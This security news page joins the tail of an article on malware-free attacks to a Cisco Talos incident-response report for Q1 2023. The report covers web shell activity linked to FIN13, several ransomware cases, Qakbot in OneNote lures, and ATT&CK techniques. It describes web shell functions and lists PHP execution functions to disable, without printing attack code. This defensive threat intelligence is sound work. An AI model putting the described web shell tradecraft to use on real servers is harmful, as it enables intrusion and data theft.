When it comes to defending the enterprise, endpoint detection and response (EDR) and other malware detection tools aren't terribly useful against malware-free cyberattacks. There's simply no malicious code to detect.

Instead, Hurtz and Sentonas urged enterprises to focus on gathering as much telemetry as possible from the endpoint to the cloud and managing identity down to the tiniest details.

But gathering all that telemetry and identity data leaves teams with vast oceans of information that's not particularly useable for threat hunting. That's where artificial intelligence (AI) and machine learning (ML) can be meaningfully deployed to look for anomalous activity, like added user accounts, to detect malicious activity, without malicious code.

It's also important to protect the enterprise MFA service from compromise, they added.

"Maintain good identity store hygiene, Sentonas said. "And protect the services you use for MFA."

Malware-Free Cyberattacks Are On the Rise; Here's How to Detect Them

In 45 percent of engagements, attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter.

Wednesday, April 26, 2023 08:04

**Web shell usage spikes in Q1 compared to previous quarters, correlating with higher instances of exploitation of public-facing applications.**

In a novel increase compared to previous quarters, Cisco Talos Incident Response (Talos IR) reports that web shells were the most-observed threat in the first quarter of 2023, comprising nearly a fourth of the incidents Talos IR engaged in. The functionality of these web shells and the specific vulnerabilities and weaknesses in the platforms they targeted varied. Although each web shell had its own sets of basic functions, when there were multiple web shells present in a single engagement, threat actors chained them together to provide a more flexible toolkit for spreading access across the network. This demonstrates the skills actors have in combining multiple means of accesses and tools and increases the liklihood that they will be able to deploy additional malware or obtain sensitive and private information.

Ransomware made up a smaller portion of threats observed this quarter than in the past, from 20% to around 10%. Given that Talos IR observed a recent surge of ransomware incidents at the end of the quarter that did not close off, this decrease does not necessarily signify a decline in general ransomware activity as much as it is a reflection of activity seen against Talos IR’s customer base. However, ransomware and pre-ransomware incidents combined made up more than 20 percent of threats observed. While it can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place, many of the pre-ransomware engagements featured activity associated with prominent ransomware groups, such as Vice Society. We note that in this quarter, particularly in an aforementioned Vice Society engagement, swift action from defenders at victim organizations as well as Talos IR helped mitigate malicious activity before encryption could occur.

This quarter also featured previously seen commodity loaders, such as Qakbot. In engagements this quarter, Qakbot leveraged malicious OneNote documents, consistent with an uptick in various malware distributing weaponized Microsoft Office OneNote attachments. This is evidence of an ongoing trend of threat actors experimenting with file types that do not rely on macros to deliver malicious payloads following Microsoft’s move to start disabling macros by default in its applications in July 2022.

In 45 percent of engagements, attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter. In many of these engagements, web shell usage contributed to this uptick where adversaries were attempting to compromise web-based servers exposed to the internet.

**Targeting**

Health care and public health was the most targeted vertical this quarter, closely followed by the retail and trade, real estate and food services/accommodation sectors, including hospitality.

**Web shell usage spike, featuring activity from FIN13**

Since January 2023, Talos IR observed an increase in web shell usage from 6% of all threats last quarter to now comprising nearly 25% of all threats. Web shells are malicious scripts that enable threat actors to compromise web-based servers exposed to the internet. This quarter, Talos observed threat actors using publicly available or modified web shells coded in various languages, including PHP, ASP.NET and Perl. After leveraging web shells to establish a foothold and gain persistent access to a system, adversaries remotely executed arbitrary code or commands, moved laterally within the network, or delivered additional malicious payloads. In many of these web shell incidents, adversaries relied heavily on web shell code sourced from publicly available GitHub repositories. This finding is also in line with a trend observed from Talos IR engagements from July to September 2022 (Q3 2022), where adversaries used a variety of open-source tools and scripts hosted on GitHub repositories to support operations across multiple stages of the attack lifecycle.

In one cluster of web shell activity, Talos observed targeting patterns and tactics, techniques and procedures (TTPs) potentially associated with the FIN13 cybercriminal threat actor, a significant finding in Talos IR engagements given FIN13’s targeted behavior. The web shells with known FIN13 TTPs have varying levels of functionality which include allowing queries to Microsoft SQL (MS-SQL) instances, creating reverse shell connection(s) to external IP addresses, and executing PHP scripts which can be used as a proxy to connect to other services. Consistent with public reporting on FIN13, Talos IR observed a PHP-based web shell (“404.php”) that took an IP or DNS entry and a port and attempted to create a proxy connection. The second web shell (“ms3.aspx”) was Windows-based and allowed SQL connections to an internal server and, if successful, results would be rendered in the browser. The third was another PHP-based web shell (“re.php”) that conducted port scans and created an outbound socket to respond/exfiltrate data to the attacker. This specific web shell contained a hardcoded IP address which resolved to cloud service provider DigitalOcean. The final web shell (“tx.asp”) was a Windows-based web shell that used “wscript.shell” and exec() to run commands rendered to the screen via an HTML document. While each web shell on its own had basic functionality, by chaining them together, the actor created a flexible toolkit for spreading their access across the network, while providing a proxy for exfiltrating sensitive data.

While the exact reason for this quarter’s increased appearance of web shells is unknown, their recent increased popularity may potentially be related to the ease of obtaining their code through open-source repositories. The availability of and easy access to open-source web shell code, paired with systems that may be publicly exposed or have poorly managed patching, make the use of web shells a lucrative option.

**Ransomware**

Ransomware made up a much smaller portion of threats this quarter, from 20% of threats to 10%. Looking ahead, there was a recent spike in ransomware engagements which we expect to level out again next quarter. Combined, ransomware and pre-ransomware incidents made up over 20 percent of threats observed.

In a Phobos ransomware engagement, a threat that Talos IR has responded to since 2020, the initial access likely involved remote desktop protocol (RDP). The adversary deployed a file named “mimidrv.sys," which is a signed Windows kernel mode software driver meant to be used with the Mimikatz executable. Talos IR also identified seven startup items that included downloading the ransomware executable, “Fast.exe.” This is a common persistence technique that followed activity where the adversary made modifications to the registry on the customer’s Amazon Relational Database Service (RDS) server. Upon encryption, attackers encrypted the files, appending them with the “.faust” extension and dropped a ransom note on the targeted systems.

This quarter also featured the Daixin ransomware, a newer ransomware-as-a-service (RaaS) family that Talos IR had never seen before in an engagement. Daixin, which first emerged in June 2022, typically involves affiliates gaining access to victim systems through virtual private networks (VPN) servers or by exploiting unpatched vulnerabilities, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA). In a Daixin ransomware engagement, the affiliate modified registry values, mapped network shares, and ran randomly named BAT files as services on the system. Talos IR also identified the Impacket toolset, a collection of Python classes for working with different network protocols, and a PowerShell script loading a Cobalt Strike payload which subsequently launched a Cobalt Strike shellcode listening on port 4444.

We assess that the recent law enforcement efforts to disrupt ransomware actors will create space for new groups to emerge, consistent with a pattern that has been ongoing for years. In January 2023, the U.S. Department of Justice announced a months-long disruption campaign against the Hive ransomware group. The FBI, along with foreign law enforcement partners, seized Hive servers after entering its networks and capturing keys to decrypt its software, effectively disrupting operations. We have not observed Hive ransomware in Talos IR engagements since August 2022, a likely indication that Hive operations have ceased while former members possibly look to join other groups or rebrand under new names.

**Malicious OneNote documents continue to be leveraged in engagements this quarter**

The Qakbot commodity loader was observed across engagements this quarter leveraging ZIP files containing malicious OneNote documents, consistent with endpoint telemetry and public reporting on threats leveraging OneNote documents in phishing emails starting at the end of 2022 and early 2023. In one Qakbot engagement, a ZIP file ("Inv\_02\_02\_#3.zip") was detected as Qakbot and contained a malicious OneNote document which attempted to lure a user to click “open” containing a malicious embedded URL.

While Talos IR did not respond to any Emotet incidents this quarter, Emotet reemerged in March 2023, resuming its spam operations after a months-long hiatus. In a relatively short period, Emotet modified its infection chain several times to maximize the likelihood of successfully infecting victims. By mid-March, Emotet had switched to distributing malicious OneNote documents, highlighting the ways in which threat actors will continue to identify and quickly implement updated delivery methods to infect victims.

**Initial vectors**

This quarter featured 45 percent of engagements where attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter. In many of these engagements, web shell usage contributed to this uptick where adversaries were attempting to compromise web-based servers exposed to the internet. Valid accounts and/or accounts with weak passwords or single-factor authentication also helped facilitate initial access where an adversary was leveraging compromised credentials.

Several known vulnerabilities contributed to adversaries gaining initial access via exploiting public-facing applications. In one incident, Talos IR identified activity consistent with exploitation of the WordPress vulnerability, tracked as CVE-2021-24867, in AccessPress Plugin and Theme. As a result, Talos IR identified approximately 20 different web shells and/or website defacements, likely from multiple threat actors identifying and exploiting this older flaw.

In another web shell engagement, Talos IR identified a vulnerable version of Magento (Adobe Commerce) version 2.4.2 that was operating in the Kubernetes deployment at the time of exploitation. Talos IR identified a total of nine known vulnerabilities for this version of the software, not including extensions. Talos IR recommends upgrading all instances of Magento to the latest available version, and routinely checking for vulnerable outdated extension versions that need patching or removed completely to reduce the available attack surface.

**Security weaknesses**

The lack of multi-factor authentication (MFA) remains one of the biggest impediments for enterprise security. Nearly 30 percent of engagements involved organizations that either had no MFA or only had it enabled on a handful of accounts and critical services. Talos IR frequently observes ransomware and phishing incidents that could have been prevented if MFA had been properly enabled on critical services, such as endpoint detection response (EDR) solutions or VPNs. To help minimize initial access vectors, Talos IR recommends disabling VPN access for all accounts that are not using MFA.

The increase in web shell engagements highlights the need for more vigilance in helping to prevent web shells. Talos provides the following recommendations:

*   Routinely update and patch all software and operating systems to identify and remediate vulnerabilities or misconfigurations in web applications and web servers.
*   In addition to patching, perform general system hardening, including removing services or protocols where they are unnecessary and being aware of all systems exposed directly to the internet.
*   Disable unnecessary php functions in your “php.ini”, such as eval(), exec(), peopen(), proc\_open() and passthru().
*   Frequently audit and review logs from web servers for unusual or anomalous activity.

**Top-observed MITRE ATT&CK techniques**

The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note, this is not an exhaustive list.

Key findings from the MITRE ATT&CK framework include:

*   Exploitation of public-facing applications was the top observed initial access technique, with the increased web shell activity likely contributing to this significant observation.
*   PowerShell is routinely used by adversaries to support a multitude of threats. We continued to observe high usage of PowerShell, in addition to a number of other scripting languages, including Python, Unix shell, and Windows command shell, which enabled web shell execution.
*   The open source red-teaming security toolkit Mimikatz was used to support nearly 60 percent of ransomware and pre-ransomware engagements this quarter. Consistently observed across previous quarters, Mimikatz is a widely used post-exploitation tool used to steal login IDs, passwords, and authentication tokens from compromised Windows systems.

Tactic 

Technique 

Example 

Initial Access (TA0001) 

T1190 Exploit Public-Facing Application  

Attackers successfully exploited a vulnerable application that was publicly exposed to the internet 

Reconnaissance (TA0043) 

T1592 Gather Victim Host Information 

Text file contains details about host 

Persistence (TA0003) 

T1505.003 Server Software Component: Web Shell  

Adversaries deployed web shells against web-based servers 

Execution (TA0002) 

T1059.001 Command and Scripting Interpreter: PowerShell  

Executes PowerShell code to retrieve information about the client's Active Directory environment 

Discovery (TA0007) 

T1046 Network Service Scanning   

Use a network or port scanner utility  

Credential Access (TA0006) 

T1003 OS Credential Dumping 

Deploy Mimikatz and publicly available password lookup utilities 

Privilege Escalation (TA0004)  

1484 Domain Policy Modification

Modify GPOs to execute malicious files  

Lateral Movement (TA0008) 

T1021.001 Remote Desktop Protocol  

Adversary made attempts to move laterally using Windows Remote Desktop 

Defense Evasion (TA0005) 

T1027 Obfuscated Files or Information 

Use base64-encoded PowerShell scripts 

Command and Control (TA0011) 

T1105 Ingress Tool Transfer  

Adversaries transfer/download tools from an external system 

Impact (TA0040) 

T1486 Data Encrypted for Impact  

Deploy Hive ransomware and encrypt critical systems 

Exfiltration (TA0010) 

T1567 Exfiltration Over Web Service 

Use legitimate external web service to  system information  

Collection (TA0009) 

T1560.001 Archive Collected Data 

Adversary leveraged xcopy on Windows to copy files  

Software/Tool 

S0002 Mimikatz 

Use Mimikatz to obtain account logins and passwords

Tag

#sql